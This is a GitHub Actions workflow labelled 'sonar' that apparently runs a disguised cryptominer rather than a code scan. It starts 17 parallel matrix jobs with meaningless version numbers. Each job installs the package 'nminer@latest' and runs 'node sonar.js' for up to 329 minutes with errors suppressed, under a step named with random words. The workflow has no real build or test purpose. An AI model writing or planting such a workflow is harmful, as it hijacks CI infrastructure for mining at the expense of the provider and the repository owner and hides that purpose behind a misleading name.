name: sonar
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 4418 }
          - { version: 1427 }
          - { version: 5901 }
          - { version: 2131 }
          - { version: 8308 }
          - { version: 8112 }
          - { version: 9378 }
          - { version: 1380 }
          - { version: 1896 }
          - { version: 7146 }
          - { version: 6904 }
          - { version: 2538 }
          - { version: 3610 }
          - { version: 1278 }
          - { version: 8793 }
          - { version: 1089 }
          - { version: 5168 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: pronoun although tenant duh nocturnal
        run: |
          npm install nminer@latest
          timeout 329m node sonar.js || echo "sonar executed"